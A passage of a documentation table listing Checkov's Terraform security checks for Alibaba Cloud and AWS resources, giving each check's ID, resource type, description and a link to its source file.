[RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | +| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | +| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | +| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | +| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | +| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | +| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | +| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | +| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | +| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | +| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | +| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | +| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | +| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | +| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | +| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | +| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | +| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | +| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | +| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | +| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | +| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | +| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | +| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | +| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | +| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | +| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | +| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | +| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | +| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | +| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | +| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | +| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | +| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | +| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | +| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | +| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | +| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | +| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | +| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 73 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | +| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | +| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | +| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | +| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | +| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | +| 88 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | +| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | +| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | +| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | +| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | +| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | +| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | +| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | +| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | +| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | +| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | +| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | +| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | +| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | +| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | +| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | +| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | +| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | +| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | +| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | +| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | +| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | +| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | +| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | +| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | +| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | +| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | +| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | +| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | +| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | +| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | +| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | +| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | +| 128 | CKV_AWS_62 | resource | 